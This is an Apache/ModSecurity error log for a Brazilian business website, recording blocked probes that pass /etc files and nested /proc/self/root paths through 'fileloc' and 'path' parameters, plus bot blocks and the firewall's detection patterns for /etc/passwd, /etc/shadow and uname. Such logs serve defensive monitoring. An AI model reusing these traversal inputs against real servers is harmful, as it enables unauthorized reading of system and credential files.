[Fri Mar 20 11:25:25.185961 2026] [:error] [pid 10189:tid 140411574073088] [client 216.73.216.191:51228] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y1TJ3M9BSuKP7CAZSmQAAAJQ"]
[Fri Mar 20 11:25:28.213107 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.91:51398] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Y2F1pVZ5mVmJwsFNbSAAAAEY"]
[Fri Mar 20 11:25:29.713782 2026] [mime_magic:error] [pid 11167:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:51506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:25:30.115571 2026] [:error] [pid 26799:tid 140411607643904] [client 216.73.216.191:51538] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y2ta6ubjKNq_cu4YGuQAAA1A"]
[Fri Mar 20 11:25:30.227399 2026] [:error] [pid 31215:tid 140411658000128] [client 216.73.216.191:51542] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y2gF0L0L-SsrnPo6VawAAAso"]
[Fri Mar 20 11:25:35.007700 2026] [:error] [pid 11167:tid 140411565680384] [client 216.73.216.191:51892] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y3_HIg5MgXLBnicMiOgAAAdU"]
[Fri Mar 20 11:25:39.242550 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.35:52098] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Y4uoXxyEfFpUF8f-skAAAAUE"]
[Fri Mar 20 11:25:41.442901 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.109:52258] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Y5bninkcc-iUj5AqJbAAAA4s"]
[Fri Mar 20 11:25:44.157459 2026] [:error] [pid 26799:tid 140411716749056] [client 216.73.216.191:52476] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y6Na6ubjKNq_cu4YG3AAAA0M"]
[Fri Mar 20 11:25:47.098179 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:44902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Y6TJ3M9BSuKP7CAZSugAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:25:48.227438 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.36:52726] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Y7DJ3M9BSuKP7CAZSwAAAAJc"]
[Fri Mar 20 11:25:49.417780 2026] [mime_magic:error] [pid 11167:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:52804] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:25:51.382918 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.244.43:36200] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1Y7_qxLDW4GITHUkQWtQAAARQ"]
[Fri Mar 20 11:25:52.503326 2026] [:error] [pid 11167:tid 140411607643904] [client 216.73.216.191:53026] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y8PHIg5MgXLBnicMiSgAAAdA"]
[Fri Mar 20 11:25:56.779165 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.14:53330] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Y9PqxLDW4GITHUkQWvwAAARU"]
[Fri Mar 20 11:26:00.638984 2026] [:error] [pid 7893:tid 140411582465792] [client 216.73.216.191:53518] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y-BCii7xarUs8iHaW4AAAAhM"]
[Fri Mar 20 11:26:59.795325 2026] [:error] [pid 7893:tid 140411574073088] [client 216.73.216.191:55898] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ZMxCii7xarUs8iHaXAgAAAhQ"]
[Fri Mar 20 11:27:08.318186 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:51196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ZPBCii7xarUs8iHaXCQAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Fri Mar 20 11:27:12.437786 2026] [mime_magic:error] [pid 7893:tid 140411599251200] (70014)End of file found: [client 74.7.243.128:51196] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/libexec/git-core
[Fri Mar 20 11:27:12.731510 2026] [:error] [pid 31215:tid 140411632822016] [client 57.141.18.41:56660] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1ZQAF0L0L-SsrnPo6V-wAAAs0"]
[Fri Mar 20 11:27:18.898581 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.241.31:34354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ZRgF0L0L-SsrnPo6WCQAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:27:19.671589 2026] [:error] [pid 31215:tid 140411548894976] [client 57.141.18.87:56994] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1ZRwF0L0L-SsrnPo6WDAAAAtc"]
[Fri Mar 20 11:28:39.003314 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:46478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Zl9a6ubjKNq_cu4YIVwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:28:44.653778 2026] [mime_magic:error] [pid 10189:tid 140411557287680] (70014)End of file found: [client 57.141.18.94:32868] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:28:49.339846 2026] [mime_magic:error] [pid 9818:tid 140411540502272] (70014)End of file found: [client 57.141.18.76:33126] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:29:10.757785 2026] [mime_magic:error] [pid 26799:tid 140411590858496] (70014)End of file found: [client 74.7.243.128:60870] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/lib
[Fri Mar 20 11:29:15.306564 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.66:34940] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1ZuuoXxyEfFpUF8f-tMgAAAUU"]
[Fri Mar 20 11:29:17.060931 2026] [:error] [pid 7235:tid 140411649607424] [client 216.73.216.191:34932] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ZvfqxLDW4GITHUkQXbQAAAQs"]
[Fri Mar 20 11:29:17.294255 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:58784] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/firmware
[Fri Mar 20 11:29:19.134733 2026] [:error] [pid 15826:tid 140411540502272] [client 216.73.216.191:35128] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ZvuoXxyEfFpUF8f-tNwAAAVg"]
[Fri Mar 20 11:29:21.475600 2026] [:error] [pid 7235:tid 140411725141760] [client 216.73.216.191:35054] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ZwfqxLDW4GITHUkQXdAAAAQI"]
[Fri Mar 20 11:29:21.723082 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.8:35326] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1ZwV1pVZ5mVmJwsFNcEQAAAFc"]
[Fri Mar 20 11:29:23.938683 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.228.61:54974] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1ZwwF0L0L-SsrnPo6WaAAAAsM"]
[Fri Mar 20 11:29:26.526548 2026] [:error] [pid 11167:tid 140411574073088] [client 216.73.216.191:35628] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ZxvHIg5MgXLBnicMjHAAAAdQ"]
